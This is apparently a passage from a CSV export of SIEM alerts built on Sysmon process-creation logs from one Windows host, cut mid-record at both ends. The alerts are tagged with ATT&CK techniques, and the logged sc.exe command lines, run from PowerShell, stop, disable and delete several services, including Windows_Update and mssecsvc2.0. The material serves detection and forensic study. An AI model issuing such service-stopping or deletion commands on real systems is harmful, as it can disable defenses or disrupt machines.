Windows_Update",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:00.097422800Z"",""eventRecordID"":""3437"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:00.093\r\nProcessGuid: {df9fc3d3-b3f0-5ecf-0000-001048532e00}\r\nProcessId: 5996\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:00.093"",""processGuid"":""{df9fc3d3-b3f0-5ecf-0000-001048532e00}"",""processId"":""5996"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Windows_Update"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:29.089",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:00.074 +ProcessGuid: {df9fc3d3-b3f0-5ecf-0000-00105f522e00} +ProcessId: 7824 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Windows_Update Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Windows_Update Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:00.077551000Z"",""eventRecordID"":""3436"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:00.074\r\nProcessGuid: {df9fc3d3-b3f0-5ecf-0000-00105f522e00}\r\nProcessId: 7824\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Windows_Update Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:00.074"",""processGuid"":""{df9fc3d3-b3f0-5ecf-0000-00105f522e00}"",""processId"":""7824"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Windows_Update Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.932",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:00.041 +ProcessGuid: {df9fc3d3-b3f0-5ecf-0000-0010bd502e00} +ProcessId: 4768 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.0 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:00.044936300Z"",""eventRecordID"":""3434"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:00.041\r\nProcessGuid: {df9fc3d3-b3f0-5ecf-0000-0010bd502e00}\r\nProcessId: 4768\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:00.041"",""processGuid"":""{df9fc3d3-b3f0-5ecf-0000-0010bd502e00}"",""processId"":""4768"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.0"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.841",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.954 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010c04d2e00} +ProcessId: 3884 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.959342900Z"",""eventRecordID"":""3431"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.954\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010c04d2e00}\r\nProcessId: 3884\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.954"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-0010c04d2e00}"",""processId"":""3884"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.711",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.905 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010a54b2e00} +ProcessId: 5584 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.909258000Z"",""eventRecordID"":""3429"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.905\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010a54b2e00}\r\nProcessId: 5584\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.905"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-0010a54b2e00}"",""processId"":""5584"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.639",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.884 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010dd4a2e00} +ProcessId: 696 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.887272000Z"",""eventRecordID"":""3428"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.884\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-0010dd4a2e00}\r\nProcessId: 696\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:59.884"",""processGuid"":""{df9fc3d3-b3ef-5ecf-0000-0010dd4a2e00}"",""processId"":""696"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:28.403",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:59.838 +ProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001085482e00} +ProcessId: 4728 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SxS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SxS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:59.841285800Z"",""eventRecordID"":""3425"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:59.838\r\nProcessGuid: {df9fc3d3-b3ef-5ecf-0000-001085482e00}\r\nProcessId: 4728\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SxS\r\nCurrentDirectory: C:\\Users\\John 